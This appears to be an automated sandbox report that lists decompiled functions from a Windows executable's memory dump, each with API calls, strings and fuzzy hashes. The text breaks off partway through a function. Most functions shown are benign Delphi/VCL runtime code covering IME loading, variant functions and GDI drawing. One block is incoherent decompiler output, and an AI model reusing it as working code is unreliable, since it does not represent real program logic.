    • API String ID: 2299586839-0
    • Opcode ID: 108ed64d26be4b16351a3299da70f0ce3c1942d88d3b1a3c3d23116fd3835508
    • Instruction ID: 15abc15796c64136693fc8185d68c91663dfa503a6783919a9878fdd7897f299
    • Opcode Fuzzy Hash: 108ed64d26be4b16351a3299da70f0ce3c1942d88d3b1a3c3d23116fd3835508
    • Instruction Fuzzy Hash: D6D05E6631D2502AE210515A6D89DBB4B9CCAC57A0F10453AB949D6342D2348C1A93F6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409924() {
    				struct _SYSTEMTIME* _t2;
    
    				GetLocalTime(_t2);
    				return _t2->wYear;
    			}

    APIs
    Similarity
    • API ID: LocalTime
    • String ID:
    • API String ID: 481472006-0
    • Opcode ID: 80ca86d94422d439cfffebf3b4cdc8deee35977a39276b931823f931439d9733
    • Instruction ID: a81bf4aa9ff04115b09102d2dc2e2a6797d93558e608b32b1fce2056f0cd125a
    • Opcode Fuzzy Hash: 80ca86d94422d439cfffebf3b4cdc8deee35977a39276b931823f931439d9733
    • Instruction Fuzzy Hash: 1AA0120840480141D54033180C0315830405800620FC40754ACB8103D2E93D023481DB
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E00406179() {
    				void* _t21;
    				signed int _t22;
    				signed int _t23;
    				void* _t25;
    				signed char _t26;
    				signed char _t27;
    				void* _t28;
    				signed char _t29;
    				intOrPtr* _t32;
    				void* _t33;
    				intOrPtr* _t36;
    				signed int _t40;
    				void* _t42;
    				signed int _t43;
    				void* _t49;
    				signed int _t50;
    				void* _t54;
    				signed int _t55;
    				void* _t59;
    
    				asm("popad");
    				_t22 = _t21 + 1;
    				 *_t26 =  *_t26 + _t22;
    				_t29 = _t28 +  *_t36;
    				 *0 =  *0 ^ _t22;
    				_t23 = _t22;
    				 *_t23 =  *_t23 + _t23;
    				if( *_t23 < 0) {
    					L8:
    					asm("outsd");
    					_t54 = _t36 - 1 + 1;
    					asm("outsd");
    					asm("arpl [ebp+0x73], si");
    					_push(_t32);
    					asm("arpl [gs:ebx+ecx+0x6f], si");
    					_push(_t32);
    					if(_t54 >= 0) {
    						L25:
    						goto ( *0x47c2ec);
    					}
    					L9:
    					if(_t54 < 0) {
    						return;
    						L30:
    						 *((intOrPtr*)(_t26 - 0x1fda0040)) =  *((intOrPtr*)(_t26 - 0x1fda0040)) + _t29;
    					}
    					 *[fs:ebx] =  *[fs:ebx] ^ _t29;
    					_t55 =  *[fs:ebx];
    					L11:
    					asm("outsd");
    					_push(_t32);
    					if(_t55 >= 0) {
    						 *((intOrPtr*)(_t26 - 0x1bda0040)) =  *((intOrPtr*)(_t26 - 0x1bda0040)) + _t29;
    						return;
    					}
    					if(_t55 < 0) {
    						_t27 = _t26 >> 0x25;
    						goto ( *0x47c2dc);
    					}
    					_t29 = _t29 ^  *[fs:esi];
    					asm("outsd");
    					_t26 = _t26 + 1;
    					asm("outsd");
    					asm("insd");
    					asm("bound ebp, [edi+0x42]");
    					asm("outsd");
    					if(_t26 < 0) {
    						 *((intOrPtr*)(_t26 - 0x13da0040)) =  *((intOrPtr*)(_t26 - 0x13da0040)) + _t29;
    						goto L25;
    					}
    					L15:
    					_t40 =  *(_t33 + _t23 + 0x57) * 0x6f646e69;
    					if(_t40 > 0) {
    						L35:
    						L36:
    						goto ( *0x47c2d0);
    					}
    					_t25 = _t23 - 0x62 + 1;
    					 *_t40 =  *_t40 + _t25;
    					_t59 =  *_t40;
    					asm("andps xmm1, [edi+0x77]");
    					asm("outsb");
    					if(_t59 < 0) {
    						goto L30;
    					}
    					L17:
    					if(_t59 < 0) {
    						 *((intOrPtr*)(_t27 - 0x2fda0040)) =  *((intOrPtr*)(_t27 - 0x2fda0040)) + _t29;
    						goto L35;
    					}
    					if(_t59 > 0) {
    						goto ( *0x47c2d8);
    					}
    					if(_t59 == 0) {
    						goto L36;
    					}
    					if(_t59 == 0) {
    						goto ( *0x47c2cc);
    					}
    					_t33 = _t33 +  *((intOrPtr*)(_t25 + 0x61));
    					_t23 = _t25 + 1;
    					 *((intOrPtr*)(_t26 - 0xbda0040)) =  *((intOrPtr*)(_t26 - 0xbda0040)) + _t29;
    					goto ( *0x47c1f4);
    				}
    				_t23 = _t23 + 1;
    				 *_t32 =  *_t32 + _t29;
    				asm("outsd");
    				_push(_t26);
    				asm("gs insb");
    				asm("arpl [gs:ebp+0x64], si");
    				 *(_t33 + 0x64) =  *(_t33 + 0x64) | _t29;
    				_t33 = _t33 + 1;
    				_t49 = _t33;
    				if(_t49 < 0) {
    					goto L9;
    				}
    				if(_t49 >= 0) {
    					goto L11;
    				}
    				_t29 = _t29 |  *[fs:edi+0x64];
    				 *(_t33 + 0x64) =  *(_t33 + 0x64) | _t43;
    				_t27 = _t26 + 1;
    				_push(0x656b6365);
    				 *[fs:edi+0x64] =  *[fs:edi+0x64] | _t43;
    				_t42 = 1 +  *(_t26 + 0x61) * 0x64656c62;
    				asm("outsd");
    				asm("arpl [ebp+0x73], si");
    				 *[fs:edi+0x64] =  *[fs:edi+0x64] | _t43;
    				_t50 =  *[fs:edi+0x64];
    				asm("popa");
    				if(_t50 != 0) {
    					goto L17;
    				}
    				if(_t50 == 0) {
    					L7:
    					asm("outsb");
    					asm("popad");
    					asm("arpl [ecx+ebp*2+0x76], si");
    					 *[gs:edi+0x64] =  *[gs:edi+0x64] | _t43;
    					_t36 = _t42 - 1;
    					asm("outsd");
    					_t29 = (_t29 |  *(_t33 + 0x64)) - 1 + 1;
    					asm("arpl [ebx+0x65], sp");
    					asm("insb");
    					_t23 = _t23 | 0x6f4e646f;
    					goto L8;
    				}
    				asm("outsd");
    				_t23 = _t23 - 1;
    				asm("outsd");
    				if(_t23 == 0) {
    					goto L15;
    				}
    				goto L7;
    			}

    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 32edee84cd40f27e41f7858b69e2e9c5b9b5180446c01a9f2504cc3c8ee834c4
    • Instruction ID: 95090e85823fe221f2b8bb975a4292f61201f404212568eed8392fe4257db1a2
    • Opcode Fuzzy Hash: 32edee84cd40f27e41f7858b69e2e9c5b9b5180446c01a9f2504cc3c8ee834c4
    • Instruction Fuzzy Hash: CF410431509B819BCB269F249B75782BF21FB13300B1986EFC49A665A3D33D7521C75C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00436D04() {
    				int _v8;
    				intOrPtr _t4;
    				struct HINSTANCE__* _t11;
    				struct HINSTANCE__* _t13;
    				struct HINSTANCE__* _t15;
    				struct HINSTANCE__* _t17;
    				struct HINSTANCE__* _t19;
    				struct HINSTANCE__* _t21;
    				struct HINSTANCE__* _t23;
    				struct HINSTANCE__* _t25;
    				struct HINSTANCE__* _t27;
    				struct HINSTANCE__* _t29;
    				intOrPtr _t40;
    				intOrPtr _t42;
    				intOrPtr _t44;
    
    				_t42 = _t44;
    				_t4 =  *0x47a120; // 0x47b738
    				if( *((char*)(_t4 + 0xc)) == 0) {
    					return _t4;
    				} else {
    					_v8 = SetErrorMode(0x8000);
    					_push(_t42);
    					_push(0x436e6a);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t44;
    					if( *0x47bb50 == 0) {
    						 *0x47bb50 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
    					}
    					if( *0x479a88 == 0) {
    						 *0x479a88 = LoadLibraryA("imm32.dll");
    						if( *0x479a88 != 0) {
    							_t11 =  *0x479a88; // 0x0
    							 *0x47bb54 = GetProcAddress(_t11, "ImmGetContext");
    							_t13 =  *0x479a88; // 0x0
    							 *0x47bb58 = GetProcAddress(_t13, "ImmReleaseContext");
    							_t15 =  *0x479a88; // 0x0
    							 *0x47bb5c = GetProcAddress(_t15, "ImmGetConversionStatus");
    							_t17 =  *0x479a88; // 0x0
    							 *0x47bb60 = GetProcAddress(_t17, "ImmSetConversionStatus");
    							_t19 =  *0x479a88; // 0x0
    							 *0x47bb64 = GetProcAddress(_t19, "ImmSetOpenStatus");
    							_t21 =  *0x479a88; // 0x0
    							 *0x47bb68 = GetProcAddress(_t21, "ImmSetCompositionWindow");
    							_t23 =  *0x479a88; // 0x0
    							 *0x47bb6c = GetProcAddress(_t23, "ImmSetCompositionFontA");
    							_t25 =  *0x479a88; // 0x0
    							 *0x47bb70 = GetProcAddress(_t25, "ImmGetCompositionStringA");
    							_t27 =  *0x479a88; // 0x0
    							 *0x47bb74 = GetProcAddress(_t27, "ImmIsIME");
    							_t29 =  *0x479a88; // 0x0
    							 *0x47bb78 = GetProcAddress(_t29, "ImmNotifyIME");
    						}
    					}
    					_pop(_t40);
    					 *[fs:eax] = _t40;
    					_push(0x436e71);
    					return SetErrorMode(_v8);
    				}
    			}

    APIs
    • SetErrorMode.KERNEL32(00008000), ref: 00436D1D
    • GetModuleHandleA.KERNEL32(USER32,00000000,00436E6A,?,00008000), ref: 00436D41
    • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436D4E
    • LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E6A,?,00008000), ref: 00436D6A
    • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D8C
    • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436DA1
    • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436DB6
    • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436DCB
    • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436DE0
    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436DF5
    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436E0A
    • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436E1F
    • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436E34
    • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436E49
    • SetErrorMode.KERNEL32(?,00436E71,00008000), ref: 00436E64
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
    • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
    • API String ID: 3397921170-3950384806
    • Opcode ID: 07112a71691079262c74674ea447bcc2c1e25a10dcb0029e4381786d83904e0a
    • Instruction ID: 032e71c8a77e308d49970952607f634574abd0b5a9e40cd966f72ceb36bd1caf
    • Opcode Fuzzy Hash: 07112a71691079262c74674ea447bcc2c1e25a10dcb0029e4381786d83904e0a
    • Instruction Fuzzy Hash: 7E31A374600381BEDB00DB69EC46F5937E8E748704F52A03BB908979A6DB7C5C84CB5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040DD9C() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x47b7c0 = E0040DD70("VariantChangeTypeEx", E0040D90C, _t91);
    				 *0x47b7c4 = E0040DD70("VarNeg", E0040D93C, _t91);
    				 *0x47b7c8 = E0040DD70("VarNot", E0040D93C, _t91);
    				 *0x47b7cc = E0040DD70("VarAdd", E0040D948, _t91);
    				 *0x47b7d0 = E0040DD70("VarSub", E0040D948, _t91);
    				 *0x47b7d4 = E0040DD70("VarMul", E0040D948, _t91);
    				 *0x47b7d8 = E0040DD70("VarDiv", E0040D948, _t91);
    				 *0x47b7dc = E0040DD70("VarIdiv", E0040D948, _t91);
    				 *0x47b7e0 = E0040DD70("VarMod", E0040D948, _t91);
    				 *0x47b7e4 = E0040DD70("VarAnd", E0040D948, _t91);
    				 *0x47b7e8 = E0040DD70("VarOr", E0040D948, _t91);
    				 *0x47b7ec = E0040DD70("VarXor", E0040D948, _t91);
    				 *0x47b7f0 = E0040DD70("VarCmp", E0040D954, _t91);
    				 *0x47b7f4 = E0040DD70("VarI4FromStr", E0040D960, _t91);
    				 *0x47b7f8 = E0040DD70("VarR4FromStr", E0040D9CC, _t91);
    				 *0x47b7fc = E0040DD70("VarR8FromStr", E0040DA38, _t91);
    				 *0x47b800 = E0040DD70("VarDateFromStr", E0040DAA4, _t91);
    				 *0x47b804 = E0040DD70("VarCyFromStr", E0040DB10, _t91);
    				 *0x47b808 = E0040DD70("VarBoolFromStr", E0040DB7C, _t91);
    				 *0x47b80c = E0040DD70("VarBstrFromCy", E0040DBFC, _t91);
    				 *0x47b810 = E0040DD70("VarBstrFromDate", E0040DC6C, _t91);
    				_t46 = E0040DD70("VarBstrFromBool", E0040DCDC, _t91);
    				 *0x47b814 = _t46;
    				return _t46;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040DDA5
      • Part of subcall function 0040DD70: GetProcAddress.KERNEL32(00000000), ref: 0040DD89
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
    • API String ID: 1646373207-1918263038
    • Opcode ID: 593b0a33b4a5ce258aef94eb9a31bea47b3bfcd34d5e3e65081b7b114f23eaed
    • Instruction ID: 3e0bcc79afc7f6fd1e2b6837307fa51303a95f5e24da0ace6ee65c6b7e785c49
    • Opcode Fuzzy Hash: 593b0a33b4a5ce258aef94eb9a31bea47b3bfcd34d5e3e65081b7b114f23eaed
    • Instruction Fuzzy Hash: 4141D7A1E046045AD3086BEE680193A77E9DB847147A0C47FF408BB7E5EF7CACC9466D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E0041DC50(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
    				int _v8;
    				int _v12;
    				char _v13;
    				struct HDC__* _v20;
    				void* _v24;
    				void* _v28;
    				long _v32;
    				long _v36;
    				intOrPtr _v40;
    				intOrPtr* _t78;
    				intOrPtr _t87;
    				struct HDC__* _t88;
    				intOrPtr _t91;
    				struct HDC__* _t92;
    				struct HDC__* _t135;
    				int _t162;
    				intOrPtr _t169;
    				intOrPtr _t171;
    				struct HDC__* _t173;
    				int _t175;
    				void* _t177;
    				void* _t178;
    				intOrPtr _t179;
    
    				_t177 = _t178;
    				_t179 = _t178 + 0xffffffdc;
    				_v12 = __ecx;
    				_v8 = __edx;
    				_t173 = __eax;
    				_t175 = _a16;
    				_t162 = _a20;
    				_v13 = 1;
    				_t78 =  *0x47a114; // 0x4790c8
    				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
    					_v40 = 0;
    					_push(0);
    					L00406484();
    					_v20 = E0041DAAC(0);
    					_push(_t177);
    					_push(0x41ded0);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t179;
    					_push(_t175);
    					_push(_t162);
    					_push(_a32);
    					L0040647C();
    					_v24 = E0041DAAC(_a32);
    					_v28 = SelectObject(_v20, _v24);
    					_push(0);
    					_t87 =  *0x47b8a8; // 0x93080724
    					_push(_t87);
    					_t88 = _a32;
    					_push(_t88);
    					L004065AC();
    					_v40 = _t88;
    					_push(0);
    					_push(_v40);
    					_push(_a32);
    					L004065AC();
    					if(_v40 == 0) {
    						_push(0xffffffff);
    						_t91 =  *0x47b8a8; // 0x93080724
    						_push(_t91);
    						_t92 = _v20;
    						_push(_t92);
    						L004065AC();
    						_v40 = _t92;
    					} else {
    						_push(0xffffffff);
    						_push(_v40);
    						_t135 = _v20;
    						_push(_t135);
    						L004065AC();
    						_v40 = _t135;
    					}
    					_push(_v20);
    					L00406584();
    					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
    					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
    					_v32 = SetTextColor(_t173, 0);
    					_v36 = SetBkColor(_t173, 0xffffff);
    					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
    					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
    					SetTextColor(_t173, _v32);
    					SetBkColor(_t173, _v36);
    					if(_v28 != 0) {
    						SelectObject(_v20, _v28);
    					}
    					DeleteObject(_v24);
    					_pop(_t169);
    					 *[fs:eax] = _t169;
    					_push(0x41ded7);
    					if(_v40 != 0) {
    						_push(0);
    						_push(_v40);
    						_push(_v20);
    						L004065AC();
    					}
    					return DeleteDC(_v20);
    				} else {
    					_push(1);
    					_push(1);
    					_push(_a32);
    					L0040647C();
    					_v24 = E0041DAAC(_a32);
    					_v24 = SelectObject(_a12, _v24);
    					_push(_t177);
    					_push(0x41dd23);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t179;
    					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00406B44(0xaa0029, 0xcc0020));
    					_pop(_t171);
    					 *[fs:eax] = _t171;
    					_push(0x41ded7);
    					_v24 = SelectObject(_a12, _v24);
    					return DeleteObject(_v24);
    				}
    			}

    APIs
    • SelectObject.GDI32(?,?), ref: 0041DCA8
    • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0041DD23,?,?), ref: 0041DCF7
    • SelectObject.GDI32(?,?), ref: 0041DD11
    • DeleteObject.GDI32(?), ref: 0041DD1D
    • SelectObject.GDI32(?,?), ref: 0041DD67
    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041DDE6
    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0041DE08
    • SetTextColor.GDI32(?,00000000), ref: 0041DE10
    • SetBkColor.GDI32(?,00FFFFFF), ref: 0041DE1E
    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041DE4A
    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041DE6F
    • SetTextColor.GDI32(?,?), ref: 0041DE79
    • SetBkColor.GDI32(?,?), ref: 0041DE83
    • SelectObject.GDI32(?,00000000), ref: 0041DE96
    • DeleteObject.GDI32(?), ref: 0041DE9F
    • DeleteDC.GDI32(?), ref: 0041DECA
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Object$ColorSelectStretch$Delete$Text$Mask
    • String ID:
    • API String ID: 326492243-0
    • Opcode ID: 6b0125d6de173ff0cc9ad1a9e273166aca7a30e185f9d346467ffb0408cc5115
    • Instruction ID: fab36617edda2c30c748fa97848ec24cb73c50c36d52c70e631140480a0774a6
    • Opcode Fuzzy Hash: 6b0125d6de173ff0cc9ad1a9e273166aca7a30e185f9d346467ffb0408cc5115
    • Instruction Fuzzy Hash: 6881A3B1A00209AFDB50EFA9CD81EAF77FCAB0C714F110519F618E7281C679ED508B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406C3C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
    				intOrPtr* _v8;
    				struct HWND__* _t19;
    				int* _t20;
    				int* _t26;
    				int* _t27;
    
    				_t26 = _t20;
    				_t27 = __edx;
    				_v8 = __eax;
    				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
    				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
    				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
    				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
    				if( *_t27 == 0 || _t19 == 0) {
    					 *_a8 = 0;
    				} else {
    					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
    				}
    				if( *_t26 == 0 || _t19 == 0) {
    					 *_a4 = 3;
    				} else {
    					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
    				}
    				return _t19;
    			}

    APIs
    • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00406C54
    • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00406C60
    • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00406C6F
    • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00406C7B
    • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00406C93
    • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00406CB7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: ClipboardFormatRegister$MessageSend$FindWindow
    • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
    • API String ID: 1416857345-3736581797
    • Opcode ID: c345612575ea4e5bb75eee646b4e3aa6f6b90dea58cd8c979432fc2cfaddd9d6
    • Instruction ID: 383e21380ea9402be74f673e7057eedc8ebae1c20e3cdcb7e96a5644b3f0fe3d
    • Opcode Fuzzy Hash: c345612575ea4e5bb75eee646b4e3aa6f6b90dea58cd8c979432fc2cfaddd9d6
    • Instruction Fuzzy Hash: BE114CB0244305AFF7009F65C941B66B7E8EF84710F22403BF886AB3C0D6B99C60CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 51%
    			E0041FBCC(void* __eax, long __ecx, intOrPtr __edx) {
    				void* _v8;
    				intOrPtr _v12;
    				struct HDC__* _v16;
    				struct HDC__* _v20;
    				char _v21;
    				void* _v28;
    				void* _v32;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				int _v108;
    				int _v112;
    				void _v116;
    				void* _t64;
    				int _t65;
    				intOrPtr _t66;
    				long _t77;
    				void* _t107;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				long _t120;
    				intOrPtr _t123;
    				void* _t127;
    				void* _t129;
    				intOrPtr _t130;
    
    				_t127 = _t129;
    				_t130 = _t129 + 0xffffff90;
    				_t120 = __ecx;
    				_t123 = __edx;
    				_t107 = __eax;
    				_v8 = 0;
    				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
    					return _v8;
    				} else {
    					E0041F0C0(_t107);
    					_v12 = 0;
    					_v20 = 0;
    					_push(_t127);
    					_push(0x41fdc7);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t130;
    					_push(0);
    					L0040677C();
    					_v12 = E0041DAAC(0);
    					_push(_v12);
    					L00406484();
    					_v20 = E0041DAAC(_v12);
    					_push(0);
    					_push(1);
    					_push(1);
    					_push(_v108);
    					_t64 = _v112;
    					_push(_t64);
    					L0040646C();
    					_v8 = _t64;
    					if(_v8 == 0) {
    						L17:
    						_t65 = 0;
    						_pop(_t116);
    						 *[fs:eax] = _t116;
    						_push(0x41fdce);
    						if(_v20 != 0) {
    							_t65 = DeleteDC(_v20);
    						}
    						if(_v12 != 0) {
    							_t66 = _v12;
    							_push(_t66);
    							_push(0);
    							L004069B4();
    							return _t66;
    						}
    						return _t65;
    					} else {
    						_v32 = SelectObject(_v20, _v8);
    						if(__ecx != 0x1fffffff) {
    							_push(_v12);
    							L00406484();
    							_v16 = E0041DAAC(_v12);
    							_push(_t127);
    							_push(0x41fd7f);
    							_push( *[fs:eax]);
    							 *[fs:eax] = _t130;
    							if(_v96 == 0) {
    								_v21 = 0;
    							} else {
    								_v21 = 1;
    								_v92 = 0;
    								_t107 = E0041F504(_t107, _t123, _t123, 0,  &_v116);
    							}
    							_v28 = SelectObject(_v16, _t107);
    							if(_t123 != 0) {
    								_push(0);
    								_push(_t123);
    								_push(_v16);
    								L004065AC();
    								_push(_v16);
    								L00406584();
    								_push(0);
    								_push(_t123);
    								_push(_v20);
    								L004065AC();
    								_push(_v20);
    								L00406584();
    							}
    							_t77 = SetBkColor(_v16, _t120);
    							_push(0xcc0020);
    							_push(0);
    							_push(0);
    							_push(_v16);
    							_push(_v108);
    							_push(_v112);
    							_push(0);
    							_push(0);
    							_push(_v20);
    							L00406464();
    							SetBkColor(_v16, _t77);
    							if(_v28 != 0) {
    								SelectObject(_v16, _v28);
    							}
    							if(_v21 != 0) {
    								DeleteObject(_t107);
    							}
    							_pop(_t117);
    							 *[fs:eax] = _t117;
    							_push(0x41fd86);
    							return DeleteDC(_v16);
    						} else {
    							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
    							if(_v32 != 0) {
    								SelectObject(_v20, _v32);
    							}
    							goto L17;
    						}
    					}
    				}
    			}

    APIs
    • GetObjectA.GDI32(?,00000054,?), ref: 0041FBEF
    • 72E7AC50.USER32(00000000,00000000,0041FDC7,?,?,00000054,?), ref: 0041FC1D
    • SelectObject.GDI32(?,00000000), ref: 0041FC63
    • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0041FC85
    • SelectObject.GDI32(?), ref: 0041FCDB
    • SetBkColor.GDI32(?), ref: 0041FD16
    • SetBkColor.GDI32(?,00000000), ref: 0041FD44
    • SelectObject.GDI32(?,00000000), ref: 0041FD57
    • DeleteObject.GDI32 ref: 0041FD63
    • DeleteDC.GDI32(?), ref: 0041FD79
    • SelectObject.GDI32(?,00000000), ref: 0041FD94
    • DeleteDC.GDI32(00000000), ref: 0041FDB0
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Object$Select$Delete$Color
    • String ID:
    • API String ID: 1817384775-0
    • Opcode ID: df99035b9c8b9383cb0f3573e06fd8db823bed49e12040458d141f2b1159f263
    • Instruction ID: df0fd280a3e210b11f18626dd50523609216d78c75682d83d04e631589580a02
    • Opcode Fuzzy Hash: df99035b9c8b9383cb0f3573e06fd8db823bed49e12040458d141f2b1159f263
    • Instruction Fuzzy Hash: BA512BB1E00209BFDB10EBE9DC46FEEB7FCAB08704F11446AB605E7281D67899558B58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00422988(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
    				struct tagPOINT _v12;
    				int _v16;
    				struct tagRECT _v32;
    				struct tagRECT _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t60;
    				int _t61;
    				RECT* _t64;
    				struct HDC__* _t65;
    
    				_t64 = _a8;
    				_t65 = _a4;
    				if( *0x47b93f != 0) {
    					_t61 = 0;
    					if(_a12 == 0) {
    						L14:
    						return _t61;
    					}
    					_v32.left = 0;
    					_v32.top = 0;
    					_v32.right = GetSystemMetrics(0);
    					_v32.bottom = GetSystemMetrics(1);
    					if(_t65 == 0) {
    						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
    							L13:
    							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
    						} else {
    							_t61 = 1;
    						}
    						goto L14;
    					}
    					_v16 = GetClipBox(_t65,  &_v48);
    					if(GetDCOrgEx(_t65,  &_v12) == 0) {
